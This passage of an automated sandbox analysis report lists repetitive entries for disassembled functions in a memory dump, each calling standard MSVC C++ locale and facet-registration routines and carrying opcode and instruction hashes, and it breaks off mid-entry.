                                                                                                                                  • Opcode Fuzzy Hash: aa920c784afd7c0b5a05082a07aefc037d607c27282b2d292fb4f4cc37df7121
                                                                                                                                  • Instruction Fuzzy Hash: 1301E131900619DBCB01DFE8C8546ED77796F853A8F214D19D4106B2C0DF74D94B8B80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F6FA7, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F6FAE
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F6FB8
                                                                                                                                  • int.LIBCPMT ref: 6E8F6FCF
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • codecvt.LIBCPMT ref: 6E8F6FF2
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7009
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7029
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7036
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2133458128-0
                                                                                                                                  • Opcode ID: 1bf6b899ca101f06567fbfbbed79e65931f40c395f16963f4a753757d9e63fa6
                                                                                                                                  • Instruction ID: 641ef61c77950bc5d8721f6d2b253bb4c85b23ef45c02d880657e616d279af3f
                                                                                                                                  • Opcode Fuzzy Hash: 1bf6b899ca101f06567fbfbbed79e65931f40c395f16963f4a753757d9e63fa6
                                                                                                                                  • Instruction Fuzzy Hash: AE01003290061ADBCF01DBE8C944AED7BBAAF95398F100D09E4106B2C0DF709907CB80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F77CD, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F77D4
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F77DE
                                                                                                                                  • int.LIBCPMT ref: 6E8F77F5
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E8F7818
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F782F
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F784F
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F785C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  • Opcode ID: a656823e91607e937b017622b5daf447ed7c11b26feaf54d0728b322e38f090d
                                                                                                                                  • Instruction ID: e9d54880b63d4297d821e5a849d6e6e4b2f9fe06f028f4bb3899fcccbeecd907
                                                                                                                                  • Opcode Fuzzy Hash: a656823e91607e937b017622b5daf447ed7c11b26feaf54d0728b322e38f090d
                                                                                                                                  • Instruction Fuzzy Hash: CB01AD7191061ADBCF01DBE8C854AEE7B7AAF85798F110D09D8207B2C0DFB4994BCB85
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F6F12, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F6F19
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F6F23
                                                                                                                                  • int.LIBCPMT ref: 6E8F6F3A
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • codecvt.LIBCPMT ref: 6E8F6F5D
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F6F74
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F6F94
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F6FA1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2133458128-0
                                                                                                                                  • Opcode ID: d1030b06d2f5aa4121ea26ec50ad6b57fbb90372484cb71ff553ba46f0a8e890
                                                                                                                                  • Instruction ID: fb9337e4f7512081448f26087920015ea042424f418dd1f09609624ad285655d
                                                                                                                                  • Opcode Fuzzy Hash: d1030b06d2f5aa4121ea26ec50ad6b57fbb90372484cb71ff553ba46f0a8e890
                                                                                                                                  • Instruction Fuzzy Hash: F601007190061ACFCF01DBE8C9546EDB7BAAF853A8F100D08E4107B280DF749D078B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7738, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F773F
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7749
                                                                                                                                  • int.LIBCPMT ref: 6E8F7760
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E8F7783
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F779A
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F77BA
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F77C7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  • Opcode ID: faf2082c7afb7bd9763d18addb3220ca3261c5e75caf2aabfa48005d1af7bd5f
                                                                                                                                  • Instruction ID: b3061b1730628ee052c02a71ad862e3970b0d98f4f76a6cdc7e4c448357d2560
                                                                                                                                  • Opcode Fuzzy Hash: faf2082c7afb7bd9763d18addb3220ca3261c5e75caf2aabfa48005d1af7bd5f
                                                                                                                                  • Instruction Fuzzy Hash: 4E010431910516CBCF01DBE8C954AFDB7796F99398F100C09D8107B2D0DF70990B8B80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E9054C2, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E9054C9
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E9054D3
                                                                                                                                  • int.LIBCPMT ref: 6E9054EA
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E90550D
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E905524
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E905544
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E905551
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  • Opcode ID: a06535d85f0b3ea2673badb76d1f2055795cb7b6462a15ea719969377ba90d4d
                                                                                                                                  • Instruction ID: f5696bb098a0e7b2ed37def93ee7a32f4ece3faac1e19897fcf2bc001d178cfa
                                                                                                                                  • Opcode Fuzzy Hash: a06535d85f0b3ea2673badb76d1f2055795cb7b6462a15ea719969377ba90d4d
                                                                                                                                  • Instruction Fuzzy Hash: 7701ED71900615DBCF11DBE8C854AEDB7BAAF85358F504C0DD8206B280DB74DE46CF80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E905557, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E90555E
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E905568
                                                                                                                                  • int.LIBCPMT ref: 6E90557F
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • moneypunct.LIBCPMT ref: 6E9055A2
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E9055B9
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E9055D9
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E9055E6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3376033448-0
                                                                                                                                  • Opcode ID: c1ea7862f15c28b928574993d6450b2d3595b8ede1b35c607808d22499b76cd5
                                                                                                                                  • Instruction ID: d66bf114ecf11d8b128a724da7dd0f1daab3a55ac3769e12fc767a5f95a6ee05
                                                                                                                                  • Opcode Fuzzy Hash: c1ea7862f15c28b928574993d6450b2d3595b8ede1b35c607808d22499b76cd5
                                                                                                                                  • Instruction Fuzzy Hash: 49010072900619DBCF21DBE8C9456ED77BAAF953A8F600D0CD4106B280DF74DA46CB80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7290, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7297
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F72A1
                                                                                                                                  • int.LIBCPMT ref: 6E8F72B8
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • messages.LIBCPMT ref: 6E8F72DB
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F72F2
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7312
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F731F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 958335874-0
                                                                                                                                  • Opcode ID: 6148d17e19e669118a9c7d215c3730a9007478641af2217ef0111155a445c5d8
                                                                                                                                  • Instruction ID: 1bd6b1eccf83cee218b1dc4075e10e2a352fe4bc22eb82e7fe894fbd58258e5a
                                                                                                                                  • Opcode Fuzzy Hash: 6148d17e19e669118a9c7d215c3730a9007478641af2217ef0111155a445c5d8
                                                                                                                                  • Instruction Fuzzy Hash: 9D01C07190461ADBCF01DFE8C954AEDB77AAF85398F200D09D8116B2D0DFB49A4BCB81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7AB6, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7ABD
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7AC7
                                                                                                                                  • int.LIBCPMT ref: 6E8F7ADE
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • numpunct.LIBCPMT ref: 6E8F7B01
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7B18
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7B38
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7B45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3064348918-0
                                                                                                                                  • Opcode ID: f9e8fdccd7ef7ffe49bdf6f7ad5993e411d630b581c20a7a7cceb702561d282c
                                                                                                                                  • Instruction ID: 1fd04e43a713bb7a8d9228d30eaace6a3c2a33949fddfb96c6b31c266e149b74
                                                                                                                                  • Opcode Fuzzy Hash: f9e8fdccd7ef7ffe49bdf6f7ad5993e411d630b581c20a7a7cceb702561d282c
                                                                                                                                  • Instruction Fuzzy Hash: 4F01C07190061ADBCF01DFE8C854AED777AAF96398F214D09D4106B2C0EF749A4B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F1AD7, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1ADE
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1AE8
                                                                                                                                  • int.LIBCPMT ref: 6E8F1AFF
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • ctype.LIBCPMT ref: 6E8F1B22
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1B39
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1B59
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1B66
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2958136301-0
                                                                                                                                  • Opcode ID: ef77c6b4966d63c09cacda65e5b84a76770a7e221276b492e748bbb6d7c8acb9
                                                                                                                                  • Instruction ID: 2057afe0d31d52383fc93f83b2f1115f96b2c7f9e72be75b99dbd3cfa2e0a647
                                                                                                                                  • Opcode Fuzzy Hash: ef77c6b4966d63c09cacda65e5b84a76770a7e221276b492e748bbb6d7c8acb9
                                                                                                                                  • Instruction Fuzzy Hash: 9101D671904619DBCF01DBE8C5546ED7B79AF95394F110D09D4107B2C0EF749E4B8B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F1A42, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1A49
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1A53
                                                                                                                                  • int.LIBCPMT ref: 6E8F1A6A
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • codecvt.LIBCPMT ref: 6E8F1A8D
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1AA4
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1AC4
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1AD1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2133458128-0
                                                                                                                                  • Opcode ID: ae2f0db7674a33c6f5ff6855a267407b918b823691d5b967158aa5b0d1459ebf
                                                                                                                                  • Instruction ID: 354c60771521728602ca451080baead33746f97589350f32e13cab0830442618
                                                                                                                                  • Opcode Fuzzy Hash: ae2f0db7674a33c6f5ff6855a267407b918b823691d5b967158aa5b0d1459ebf
                                                                                                                                  • Instruction Fuzzy Hash: 3701C471940619DBCF01DBE8C5546ED7BB9AF853A8F254D09D4106B2C0DF74DD4B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E90526E, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E905275
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E90527F
                                                                                                                                  • int.LIBCPMT ref: 6E905296
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • collate.LIBCPMT ref: 6E9052B9
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E9052D0
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E9052F0
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E9052FD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1767075461-0
                                                                                                                                  • Opcode ID: 2eed192637e09d88a373c38c27f39900528ac146d74d65ce819387088e01eefe
                                                                                                                                  • Instruction ID: 8c0cb8829c9d2f9dcb842a8ac23ab8b2ed956377469617eedb0abc2e88dd3758
                                                                                                                                  • Opcode Fuzzy Hash: 2eed192637e09d88a373c38c27f39900528ac146d74d65ce819387088e01eefe
                                                                                                                                  • Instruction Fuzzy Hash: CB012231900619DBCF01DBE8C844AED777AAF81368F600C0DD4106B290DF70DD4A8B80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E905303, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E90530A
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E905314
                                                                                                                                  • int.LIBCPMT ref: 6E90532B
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • messages.LIBCPMT ref: 6E90534E
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E905365
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E905385
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E905392
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 958335874-0
                                                                                                                                  • Opcode ID: 843274685affb6d2bc098e73c858a0ed6015018e3ef86f9a76d05027db0a5d40
                                                                                                                                  • Instruction ID: deb8aa9bdcdc5cdb8cc6735c6ed670858e15f3c80cd183a1fa110ae5c5832192
                                                                                                                                  • Opcode Fuzzy Hash: 843274685affb6d2bc098e73c858a0ed6015018e3ef86f9a76d05027db0a5d40
                                                                                                                                  • Instruction Fuzzy Hash: F401ED72900619DFCF01DBE8C854AEEB7B9AF85358F504D0DE8106B290DBB0DE4A8F80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7325, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F732C
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7336
                                                                                                                                  • int.LIBCPMT ref: 6E8F734D
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • messages.LIBCPMT ref: 6E8F7370
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7387
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F73A7
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F73B4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 958335874-0
                                                                                                                                  • Opcode ID: 6d8946abbfafc9c40bfdc8b2b07d8c7c69fe468551c8a2c2cf66bd9548b56290
                                                                                                                                  • Instruction ID: 9575e5e61a4390badd4e25f0683986cac7934f083f7c7774aee7a73d61ba4d22
                                                                                                                                  • Opcode Fuzzy Hash: 6d8946abbfafc9c40bfdc8b2b07d8c7c69fe468551c8a2c2cf66bd9548b56290
                                                                                                                                  • Instruction Fuzzy Hash: A101003190061ADBCF01DBE8C944AEDBBB9BF85398F110C0AD8106B2D0DF709A0B8B80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F7B4B, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7B52
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7B5C
                                                                                                                                  • int.LIBCPMT ref: 6E8F7B73
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • numpunct.LIBCPMT ref: 6E8F7B96
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7BAD
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7BCD
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7BDA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3064348918-0
                                                                                                                                  • Opcode ID: 62d9aac8ab43bba6c502e09c440079de329dca2f8907b555afcd648bed3fa852
                                                                                                                                  • Instruction ID: c53ceb8393b6e1ad8fb1c02e28e8924dd44ce970e8b123cca8a85baafca2e198
                                                                                                                                  • Opcode Fuzzy Hash: 62d9aac8ab43bba6c502e09c440079de329dca2f8907b555afcd648bed3fa852
                                                                                                                                  • Instruction Fuzzy Hash: CD01C431900519DBCF01DBE8C954AEDB779AF95398F104D09D410AB2C0DF74D94B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F70D1, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F70D8
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F70E2
                                                                                                                                  • int.LIBCPMT ref: 6E8F70F9
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • collate.LIBCPMT ref: 6E8F711C
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7133
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7153
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7160
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1767075461-0
                                                                                                                                  • Opcode ID: 8dd4ab68795b39779b7de57faeda79ba1cf029777b44b54c1716fdb435393f86
                                                                                                                                  • Instruction ID: d3072330960547199b362faec9aadacbab48c2a9231d1105a0f0f00114bc342f
                                                                                                                                  • Opcode Fuzzy Hash: 8dd4ab68795b39779b7de57faeda79ba1cf029777b44b54c1716fdb435393f86
                                                                                                                                  • Instruction Fuzzy Hash: CE01C031900629DBCB05DBE8C854AEE7B79BF85398F100D19D4106B3D0DF759A4B8B81
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F703C, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7043
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F704D
                                                                                                                                  • int.LIBCPMT ref: 6E8F7064
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
